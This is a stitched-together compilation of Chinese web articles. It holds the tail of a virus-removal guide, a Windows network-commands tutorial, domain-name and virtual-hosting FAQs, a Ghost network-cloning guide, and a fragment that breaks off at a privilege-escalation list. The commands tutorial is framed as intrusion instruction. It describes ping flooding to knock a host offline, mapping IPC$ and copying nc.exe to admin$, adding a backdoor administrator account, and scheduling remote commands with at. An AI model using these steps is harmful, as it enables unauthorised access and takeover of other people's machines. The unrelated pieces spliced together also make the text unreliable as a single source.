步骤:打开资源管理器(按windows徽标键+E),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。
图4 修改文件夹属性
4、时刻保持操作系统获得最新的安全更新,建议用毒霸的漏洞扫描功能。
5、启用windows防火墙保护本地计算机。
对于已经感染“熊猫烧香”病毒的用户,建议参考《熊猫烧香病毒专杀及手动修复方案》,下载其中的专钉工具进行查杀,也可手动查杀。
对于未感染的用户,专家建议,不要登陆不良网站,及时下载微软公布的最新补丁,来避免病毒利用漏洞袭击用户的电脑,同时上网时应采用“杀毒软件+防火墙”的立体防御体系。
最常用的网络命令精萃
一,ping
它是用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,出现如图1。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。
-l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。
-n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。
说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。
下面我们举个例子来说明一下具体用法。
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。
(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)
至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。
-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。
--------------------------------------------------------------------------------
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view \IP。
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \IPsharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \IPIPC$ "password" /user:"name")。
建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \192.168.0.7admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \IP。
六,at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \computer。
表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。
七,ftp
大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。
大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。
首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。
用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。
八,telnet
功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。
然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了,如图19。这里我使用的超级管理员权限登陆的。
到这里为止,网络DOS命令的介绍就告一段落了,这里介绍的目的只是给菜鸟网管一个印象,让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些,这里只是抛砖引玉,希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助,特别的熟练掌握了一些网络的DOS命令。
另外大家应该清楚,任何人要想进入系统,必须得有一个合法的用户名和密码(输入法漏洞差不多绝迹了吧),哪怕你拿到帐户的只有一个很小的权限,你也可以利用它来达到最后的目的。所以坚决消灭空口令,给自己的帐户加上一个强壮的密码,是最好的防御弱口令入侵的方法。
最后,由衷的说一句,培养良好的安全意识才是最重要的。
网站建设基础:域名知识大全总结
1.什么是域名?
从技术上讲,域名只是一个Internet中用于解决地址对应问题的一种方法。可以说只是一个技术名词。但是,由于Internet已经成为了全世界人的Internet,域名也自然地成为了一个社会科学名词。
从社会科学的角度看,域名已成为了Internet文化的组成部分。
从商界看,域名已被誉为”企业的网上商标”。没有一家企业不重视自己产品的标识--商标,而域名的重要性和其价值,也已经被全世界的企业所认识。1998年3月一个月内,世界上注册了179,331个通用顶级域名(据精品网络有关资料),平均每天注册5977个域名,每分钟25个!这个记录正在以每月7%的速度增长。中国国内域名注册的数量,从96年底之前累计的300多个,至98年11月猛增到的16644个,每月增长速度为10%。
2.为什么要注册域名?
Internet这个信息时代的宠儿,已经走出了襁褓,为越来越多的人所认识,电子商务、网上销售、网络广告已成为商界关注的热点。”上网”已成为不少人的口头禅。但是,要想在网上建立服务器发布信息,则必须首先注册自己的域名,只有有了自己的域名才能让别人访问到自己。所以,域名注册是在互联网上建立任何服务的基础。同时,由于域名的唯一性,尽早注册又是十分必要的。
为什么没注上域名比商标被抢注更头痛?
由于域名和商标都在各自的范畴内具有唯一性,并且,随着Internet的发展,从企业树立形象的角度看,域名又从某种意义上讲,和商标着潜移默化的联系。所以,它与商标有一定的共同特点。许多企业在选择域名时,往往希望用和自己企业商标一致的域名。但是,域名和商标相比又具有更强的唯一性。举个例子:同样持有Panda注册商标的某电子集团公司和某日化厂之间出现过域名注册中的冲突,按照《中国互联网络域名注册暂行管理办法》规定,两家公司都有权以panda为域名注册,但是panda.xxx.cn只有一个,那么,在域名申请都符合《中国互联网络域名注册暂行管理办法》规定的情况下,精品网络按先来先注册的原则处理申请。某日化厂先申请了panda.xxx.cn,而某电子集团公司在某日化厂已注册成功,并且网站已经开通后,才提交panda.xxx.cn域名的申请,其结果是某电子集团公司已经无法以panda.xxx.cn作为自己的域名了。
3.域名与商标的关系
从商业角度来看,域名是”企业的网上商标”。企业都非常重视自己的商标,而作为网上商标的域名,其重要性和其价值也已被全世界的企业所认识。域名和商标都在各自的范畴内具有唯一性,并且随着Internet的发展。从企业树立形象的角度看,域名和商标有着潜移默化的联系。所以,域名与商标有一定的共同特点。许多企业在选择域名时,往往希望用和自己企业商标一致的域名。但是,域名和商标相比又具有更强的唯一性。
从域名价值角度来看,域名是互联网上最基础的东西,也是一个稀有的全球资源,无论是做ICP和电子商务,还是在网上开展其它活动,都要从域名开始,一个名正言顺和易于宣传推广的域名是互联网企业和网站成功的第一步。
4.域名的管理机构
在中国域名注册通常分为国内域名注册和国际域名注册。
目前,国内域名注册统一由中国互联网络信息中心---CNNIC进行管理,具体注册工作由通过CNNIC认证授权的各代理商执行。而国际域名注册现在是由一个来自多国私营部门人员组成的非盈利性民间机构---国际域名管理中心Internet Corporation for Assigned Names and Numbers(ICANN)统一管理,具体注册工作也是由通过ICANN授权认证的各代理商执行。
5.域名解析必读?
尊敬的中法网用户:
您们好,由于上级网络提供商发生变化,我司已对原部分IP地址进行调整,请域名不在我司 注册的客户尽快按以下方法重新做域名解析:
1、首先删除域名原有A记录及MX记录
2、增加域名本身CNAME记录指向到 A01.xunnet.com
3、增加域名www记录CNAME指向到 A01.xunnet.com
4、增加域名FTP记录CNAME指向到 A01.xunnet.com
5、增加域名mail记录CNAME指向到 mx.data168.com
6、增加域名本身MX记录到: mx.data168.com
7、如果您只是企业邮局用户只需操作第1、5、6步即可
8、如您的域名不支持CNAME功能,请点击此处联系我们
6.顶级、二级、三级域名的区别
一个完整的域名由二个或二个以上部分组成,各部分之间用英文的句号”.”来分隔,最后一个”.”的右边部分称为顶级域名(TLD,也称为一级域名),最后一个”.”的左边部分称为二级域名(SLD),二级域名的左边部分称为三级域名,以此类推,每一级的域名控制它下一级域名的分配。
域名的构成
顶级域名:一个域名由两个以上的词段构成,最右边的就是顶级域名。
目前,国际上出现的顶级域名有.com,.net,.org,.gov,.edu,.mil,.cc,.to,.tv以及国家或地区的代码,其中最通用的是.com,.net,.org
.COM - -适用于商业实体,它是最流行的顶级域名,任何人都可注册一个.com域名。
.NET - -最初用于网络机构如ISP,今天,任何一个人都可注册一个.net域名。
.ORG ---设计是用于各类组织机构,包括非盈利团体,今天,任何一个人都可注册一个.org域名。 国家代码:像cn(中国),fr(法国)和au(澳大利亚)这样两个字母的域名谓之国家代码顶级域名(ccTLDs),通过ccTLDs,基本上可以辨明域名持有者的国家或地区。详细的国家代码可在www.icann.org查找。
二级域名:靠左边的部分就是所谓的二级域名,在cctv.com中,cctv就是顶级域名.com下的二级域名,cctv.com还可以有mail.cctv.com的形式,这里的mail可以谓之”主机”或”子域名”。
如何取自己喜欢的域名以及注册域名应注意的一些问题
一个好的域名是成功的开始,当您要注册一个新的域名时,请记住下列域名命名原则:
a) 容易记这是最重要的原则。
网易现在已在品牌宣传上放弃域名nease.com和netease.com,而改用163.com,因为后者比前者更好记。
b) 要同你的商业有直接关系
虽然有好多域名很容易记,但如果同你所开展的商业活动没有任何关系,用户就不能将你的域名同你的商业活动联系起来,这就意味着你还要花钱宣传你的域名。例如,一看到DrugStore.com马上知道是网上药店。
c) 长度要短
长度短的域名不但容易记,而且用户花费更少的时间来输入你的域名。例如美国最大的传统连锁书店 Barnes & Noble开设了网上书店,原来用的域名为barnesandnoble.com,自从改为bn.com后,访问量和销量有了很大的增长。
d) 正确拼写英文单词或拼音
如果你以英文单词或拼音作为域名,一定要拼写正确。
e) 用你的商标或企业名称
如果你已注册了商标,请将商标名称作为域名。如果你面对的是本地市场,请将企业名称作为域名;如果要面向国际市场,请遵守上面的原则2。
f) 注册.com下的域名
.com是首选的顶级域名,可显示企业的全球化理念。
g) 不要侵犯人家的商标
新的全球域名政策规定所注册的域名不能包含商标或名人的名字,如果你的域名违反了这条原则,不但会失去所注册域名的拥有权,而且将被罚款和起诉。
7.域名的构成
顶级域名:一个域名由两个以上的词段构成,最右边的就是顶级域名。
目前,国际上出现的顶级域名有.com,.net,.org,.gov,.edu,.mil,.cc,.to,.tv以及国家或地区的代码,其中最通用的是.com,.net,.org
.COM - -适用于商业实体,它是最流行的顶级域名,任何人都可注册一个.com域名。
.NET - -最初用于网络机构如ISP,今天,任何一个人都可注册一个.net域名。
.ORG ---设计是用于各类组织机构,包括非盈利团体,今天,任何一个人都可注册一个.org域名。 国家代码:像cn(中国),fr(法国)和au(澳大利亚)这样两个字母的域名谓之国家代码顶级域名(ccTLDs),通过ccTLDs,基本上可以辨明域名持有者的国家或地区。详细的国家代码可在www.icann.org查找。
二级域名:靠左边的部分就是所谓的二级域名,在cctv.com中,cctv就是顶级域名.com下的二级域名,cctv.com还可以有mail.cctv.com的形式,这里的mail可以谓之”主机”或”子域名”。
8.什么是泛域名解析
泛域名解析定义为:
客户的域名a.com,之下所设的*.a.com全部解析到同一个IP地址上去。比如客户设b.a.com就会自已自动解析到与a.com同一个IP地址上去,显示的是跟a.com一样的页面。
URL转发功能是我公司提供的域名注册后的增值服务。所谓URL转发,是通过服务器的特殊设置,将访问您当前域名的用户引导到您指定的另一个网络地址。例如,URL转发可以让用户在访问http://www.yourdomain.com时,自动转向访问http://www.otherdomain.com/other.htm。
9.域名的结构
顶级域名
域名由两个或两个以上的词构成, 中间由点号分隔开。最右边的那个词称为顶级域名。下面是几个常见的顶级域名及其用法:
.COM--用于商业机构。它是最常见的顶级域名。任何人都可以注册.COM 形式的域名。
.NET--最初是用于网络组织,例如因特网服务商和维修商。现在任何人都可以注册以.NET结尾的域名。
.ORG--是为各种组织包括非盈利组织而定的。现在,任何人都可以注册以.ORG 结尾的域名。
国家代码由两个字母组成的顶级域名如.cn, .uk, .de和.jp称为国家代码顶级域名(ccTLDs), 其中.cn是中国专用的顶级域名, 其注册归CNNIC管理, 以.cn结尾的二级域名我们简称为国内域名。注册国家代码顶级域名下的二级域名的规则和政策与不同的国家的政策有关。您在注册时应咨询域名注册机构, 问清相关的注册条件及与注册相关的条款。某些域名注册商除了提供以.com, .net和.org结尾的域名的注册服务之外, 还提供国家代码顶级域名的注册。ICANN并没有特别授权注册商提供国家代码顶级域名的注册服务。
二级域名
顶级域名的下一级,就是我们所说的二级域名。domainpeople.com,域名注册人在以.com结尾的顶级域名中,提供一个二级域名。域名形式也可能是something.domainpeople.com。在这种情况下,something 称为主名或分域名。
谁是国际域名管理机构 ICANN是一个近年成立的、代替NSI公司的的非盈利机构,其主要职能包括管理因特网域名及地址系统。有关ICANN的信息可在网址 http://www.icann.org 中查询。
什么是域名地址服务器(即DNS)
域名服务器用于把域名翻译成电脑能识别的IP地址。例如,如果有人要访问sohu的网站 (www.sohu.com), DNS就把域名译为IP地址 61.135.132.3 。这样就便于电脑查找域名所有人的网站服务器。
10.Internet上域名命名的一般规则是什么?
由于Internet上的各级域名是分别由不同机构管理的,所以,各个机构管理域名的方式和域名命名的规则也有所不同。但域名的命名也有一些共同的规则,主要有以下几点:
一、域名中只能包含以下字符:
1. 26个英文字母
2. ”0,1,2,3,4,5,6,7,8,9”十个数字
3. ”-”(英文中的连词号)
二、域名中字符的组合规则:
1.在域名中,不区分英文字母的大小写
2.对于一个域名的长度是有一定限制的 CN下域名命名的规则为:
1)遵照域名命名的全部共同规则
2)只能注册三级域名,三级域名用字母(A-0Z,a-z,大小写等价)、数字(0-9)和连接符(-)组成,各级域名之间用实点(.)连接,三级域名长度不得超过20个字符;
三、不得使用,或限制使用以下名称(下表列出了一些注册此类域名时需要提供的材料):
1)注册含有”CHINA”、”CHINESE”、”CN”、”NATIONAL”等 经国家有关部门(指部级以上单位)正式批准
2)公众知晓的其他国家或者地区名称、外国地名、国际组织名称不得使用
3)县级以上(含县级)行政区划名称的全称或者缩写 相关县级以上(含县级)人民政府正式批准
4)行业名称或者商品的通用名称不得使用
5)他人已在中国注册过的企业名称或者商标名称不得使用
6)对国家、社会或者公共利益有损害的名称不得使用
7)经国家有关部门(指部级以上单位)正式批准和相关县级以上(含县级)人民政府正式批准是指,相关机构要出据书面文件表示同意XXXX单位注册XXX域名。如:要申请beijing.com.cn域名,则要提供北京市人民政府的批文。
推荐:虚拟主机知识大全总结
什么是虚拟主机,为什么要使用虚拟主机?
虚拟主机(Virtual Host Virtual Server)是使用特殊的软硬件技术,把一台计算机主机分成一台台'虚拟'的主机,每一台虚拟主机都具有独立的域名和IP地址(或共享的IP地址),具有完整的Internet服务器功能。在同一台硬件、同一个操作系统上,运行着为多个用户打开的不同的服务器程序,互不干扰;而各个用户拥有自己的一部分系统资源(IP地址、文件存储空间、内存、CPU时间等)。虚拟主机之间完全独立, 在外界看来, 每一台虚拟主机和一台独立的主机的表现完全一样。
虚拟主机技术的出现,是对Internet技术的重大贡献,是广大Internet用户的福音。由于多台虚拟主机共享一台真实主机的资源,每个用户承受的硬件费用、网络维护费用、通信线路的费用均大幅度降低,Internet真正成为人人用得起的网络!现在,几乎所有的美国公司(包括一些家庭)均在网络上设立了自己的WEB服务器,其中有相当的部分采用的是虚拟主机!
虚拟主机能干什么?
我公司提供的虚拟主机服务可以支持最先进的技术如PHP、CGI、数据库挂接等。用户可以通过浏览器轻松管理网站:
a) 按要求生成各类统计报告,网站访问统计、各类日志等等。
b) 自行备份以及恢复网站数据(包括数据库)。
c) 创建自己的邮件账户、以及邮件列表。
d) 轻松的通过Frontpage2000以及Dreamweaver修改自己的页面
什么是CGI程序?
CGI 是 Common Gateway Interface 的缩写,是服务器端和用户沟通的程序, 它可以使你的网页更生动,网络上很多工具例如搜索引擎、留言板、BBS等都是 CGI 程序。CGI的文件名后缀是.cgi 或 .pl 。
在虚拟主机上可以运行CGI程序吗?
可以,支持Perl、C、C++、JAVA等语言写成的CGI程序。同时,我们还将免费提供给你很多现成的常用CGI程序供你使用,如BBS,网上订单,计数器。
什么是web空间?
WEB空间即为存放网站页面内容的空间。
什么是log?
用户的虚拟主机在工作时,时刻将WWW访问的结果记录在一些log(日志)文件中,它们记录了 什么时间、什么客户访问了什么文件、是否传送成功等信息,但这些信息一条一条的数目很大,用户难以直接从log文件获得直观的结果,为此,我们在服务器上安装了先进的访问统计软件,它对用户的log文件进行处理之后,获得诸如:在过去的一段时间内(如一周、一个月),用户的虚拟主机接受过多少此访问、来自何处的人访问的次数最多、哪些内容被访问的次数最多、每天的情况如何、每天几点钟访问得最多等等有用的信息,还可以通过彩色的立体直方图将结果显示出来。
使用虚拟主机有什么限制?
您主要在以下方面注意规范虚拟主机的使用:使用本公司提供的虚拟主机,以下行为是不允许的:散布不受欢迎的电子邮件(SPAMing)或在新闻组进行不妥的言论发布;运行与WEB服务器无关的程序或进程,包括IRC、NEWSGROUP及其他;进行编译(Compile)工作;进行政治宣传和散布色情的和内容;进行任何试图改变系统的配置或破坏系统安全的事情。不使用聊天室,在线游戏,江湖等占用系统资源过大的程序。
我用CuteFTP连接上主机后,无法列出目录,出现socket提示是什么原因造成的?
通过FTP软件登录主机时,状态窗口中出现如下错误:f
'STATUS:> Connecting data socket...
ERROR:> Failed to establish data socket'
一般出现此问题的原因是客户端网络出口与服务器端防火墙的端口设置冲突造成的,您可在FTP软件的设置中将PASV模式设置(一般为默认)选项取消即可。
我的虚拟主机开通后应做哪些方面的工作?
您的虚拟主机开通后应该按以下步骤操作:
a) 上传网页。
b) 域名解析 : 如果您的主机域名DNS是在我公司申请的,主机开通时系统己自动帮您设置了域名解析(包括WWW、FTP); 但如果您的主机域名DNS不在我公司,则需请您与域名解析服务商联系做域名解析事宜。
什么是静态IP?
静态IP就是独立的IP。
My SQl数据库具体内容包括什么?
a) 概念;mysql是一个可用于各种流行的操作系统平台的关系数据库系统(关系数据库RDBMS是许多环境中的一个基本的工具,从商务,研究和教育环境中的许多传统应用程序到诸如互联网上的搜索引擎这样的应用程序都要使用关系数据库)他具有客户机/服务器体系结构的分布式数据库关系提供。
b) 特点:MYSQL具有功能强,使用简单,管理方便,运行速度快,可靠性高,安全保密等特点。
c) 作用:数据库的主要功能只在组织和管理很庞大或复杂的信息和基于WEB的库存查询请求不仅仅为客户提供信息,而且还可以为您自己使用数据库可以提供如下功能:
一)减少记录编档的时间
二)减小记录检索时间
三)灵活的查找序列
四)灵活的输出格式
五)多个用户同时访问记录
虚拟主机采用什么操作系统?
目前使用最多的操作系统是Unix和微软的WindowsNT,两者各有所长。如果你觉得在Unix和NT之间很难选择,就不要犹豫地选择Unix。
什么是SPAM?
SPAM是指在Internet上利用Email进行广播式的广告宣传的行为。这种行为给很多人的信箱里塞入大量无关或无用的信息,因此越来越受到人们的厌恶,在美国这已经属非法行为。
什么是匿名FTP?
匿名FTP是指在登录FTP服务器时,用户名采用'anonymous',口令为自己的Email地址就可以登录。可以看出,匿名FTP对任何用户都是敞开的,但登录后用户的权限很低,一般只能从服务器下传文件,而不能上传或修改服务器上的内容。它可以有效地帮助网站的拥有者提供文件或软件供Internet上的用户下传。
什么是访问统计报告?
用户的'虚拟主机'在工作时,时刻将WWW访问的结果记录在一些log(日志)文件中,它们记录了什么时间、什么客户访问了什么文件、是否传送成功等信息,但这些信息一条一条的数目很大,用户难以直接从log文件获得直观的结果。为此,我们在服务器上安装了先进的访问统计软件,它对用户的log文件进行处理之后,获得诸如:在过去的一段时间内(如一周、一个月),用户的'虚拟主机'接受过多少次访问、来自何处的人访问的次数最多、哪些内容被访问的次数最多、每天的情况如何、每天几点钟访问得多等等有用的信息,还可以通过彩色的立体直方图将结果显示出来。
什么是1U
1U等于4.45厘米
在虚拟主机上可以运行我的CGI程序吗?
可以,支持Perl、C、C++、JAVA等语言写成的CGI程序。同时,我们还将免费提供给你很多现成的常用CGI程序供你使用,如BBS,网上订单,计数器。
由于把一台机器的资源分配给若干台'虚拟主机',每台'虚拟主机'的性能是否会下降?
这个问题取决于主机的性能及所开设虚拟主机的数量,如果配置得当,加上采用高带宽的线路,(我们国外、国内服务器的接入带宽分别为:155M,105M)虚拟主机会快于采用较低带宽线路连接的独立主机。每台主机的用户数量我们会控制在一定量的范围内,在充分利用主机的性能同时又能保障户利益。
使用虚拟主机有什么限制?
以下行为是不允许的:散布不受欢迎的电子邮件(SPAM)或在新闻组进行不妥的言论发布;进行政治宣传和散布色情内容;进行任何试图改变系统的配置或破坏系统安全的事情。由以上行为所引起的问题我们将移交公安部门处理。
上传网页时需注意些什么问题?
a) 网站的默认首页应该是index.htm,index.asp(win2000主机),index.php(Linux主机)均可;
b) 最近有部分用户违反我司规定,往服务器上上传聊天室和在线游戏等程序,给我司的服务器维护及其他虚拟主机用户的权益带来了很大的不便,现特申明:虚拟主机用户擅自上传的聊天室和在线游戏等程序一经我们发现,将一律给予删除,对屡次上传这些程序的用户,我们保留锁定其上传帐号和关闭其网站的权利;
c) 本服务器上提供有jmail和SA-FileUP组件,不提供其他组件,如果您有其他问题,请和系统管理员联系;
d) 如果您在上传时碰到任何问题,请您及时与支持信箱联系:support@dsh.cn
为什么文件已经上传,但无法显示网站内容呢?
虚拟主机所设定的默认文档为index.htm及index.asp,如果您所上传首页文件名与此不符,则输入域名后无法直接访问。您可通过ftp软件修改您的默认文档的文件名,以实现正常的访问。
虚拟主机支持BBS论坛?
可以使用WWW方式的BBS论坛。
两个域名共用空间和一个域名指向另一个域名的空间有什么不同?
共用空间的前提条件是其中一个域名的虚拟主机空间在我司的服务器上。
多个域名可以共用一个虚拟主机吗?我们的域名都在贵处申请的,请提供具体的方法。
多个域名可以共用一个虚拟主机。只要这些域名的域名服务器(DNS)都是本公司提供的,虚拟主机是在本公司开设的就可以实现,每个域名访问的结果是一样的主页面,这项服务免费。
access数据库(mdb文件)无法上传,而其他文件却可以上传,是什么原因?
原因是您的网站中有个同名的mdb文件,而此时正被打开,覆盖上传时当然会出错。
解决办法:先将该网站的web停掉(您可以在虚拟主机管理中停止,或联系我们帮您停止),然后再上传就可以了。上传成功后不要忘记打开web服务。
GHOST网络傻瓜教程 (多图){GHOST使用教程}
所以这次小申子决定推出傻瓜教程系列第二弹.网络克隆篇。
本方法经过实验,绝对通过。而且只要网络好,系统没问题,绝对不会出现问题。
恩,好,不多说废话了,现在开始我们的教程。
首先.我们做好一张母盘.并将操作系统目录里的TEMP目录里的东西,以及临时文件夹全部清空.之后将母盘系统备份到另外一块硬盘上.
首先确认备份的系统有一个比较大的分区.并确认能装下你的硬盘备份.
将准备好的另外一块硬盘挂在你做好的机器上.之后重新启动到DOS模式,启动GHOST.
选择LOCAL→DISK→TO IMAGE.之后选择你的母盘,按回车
选择你你准备好的一个足够大的分区
给文件起个名字..按回车
它会问你压缩方式.选NO是不压缩.FAST是快速压缩.HIGH是高压缩率.
由于我选的都是HIGH,而且从来没出过什么问题,在这里也推荐你使用.
因为FAT32格式分区最大只能识别2G的文件.所以每到达2G时候,会提示你会重新建立文件.
好了,文件建立完了,我们该建立GHOST服务器了.启动WINDOWS打开GHOSTSRV.EXE文件.我们讲在后面提供下载,也可以在GHOST企业版里找到.之后
给服务器起一个名字.我起的名字是shenzi
选择克隆客户端
之后选择你备份到另外一个硬盘的备份文件.
点击 接受客户的按扭
好了,现在服务器已经进入接收状态了.
之后到客户端,就是你准备要克地机器.在GHOST.EXE文件所在的目录里,创建一个WATTCP.CFG的文件.此文件是指定IP以及网关的.如果没有此文
件GHOST会自动扫描DHCP服务器.不推荐使用DHCP服务器.所以我们用DOS的命令,EDIT建立一个WATTCP.CFG的文件吧.
在GHOST.EXE所在的目录里输入 edit空格wattcp.cfg
好,之后我们建立以下内容
IP=你这台机器所指定的IP.为了避免重复,尽量使用机器号.
NETMASK=子网掩玛,根据IP规则设置.
GATEWAY=网关.就是建立了GHOST服务器的IP地址.
好了,之后驱动网卡.执行RTSPKT空格0X60,0X60是给网卡的一个中断.这里必须给网卡一个中断.否则你也驱动不起你的网卡.我用的中断是0X60.
之后进入GHOST.选择MULTICASTING
它会问你服务器名字.在这里输入你起的服务器名字.按回车
选择硬盘.按回车
在这里可以重新修改分区大小,如果没有特别要求,选择OK继续.
确认开始.选YES
好了,现在你的客户端已经进入接收状态了.
好了,在去GHOST服务器看看把,看你是不是在服务器已经看到了别的机器的IP和MAC地址了呢.
等把客户端全部连接上之后,就可以选择开始传送进行网络克隆了.
好了,我们的教程到这里就结束了,不过提醒大家,网络GHOST的机器尽量不要超过50台.如果出现问题,那麻烦的可是你了哦.如果有机器断线,请关闭那台机器等待,大约5分钟后会记为超时.GHOST还会继续运行.另外有一些网卡驱动执行完后会锁住键盘.请大家自己建立批处理文件就可以了.
xrea最新图片攻略(使用篇)
二:主要功能解说
三:修改新密码
四:修改基本资料
五:激活mysql数据库
六:绑玉米
七:玉米同步
提权基本方法如下(摘自网络):
1.radmin连接法
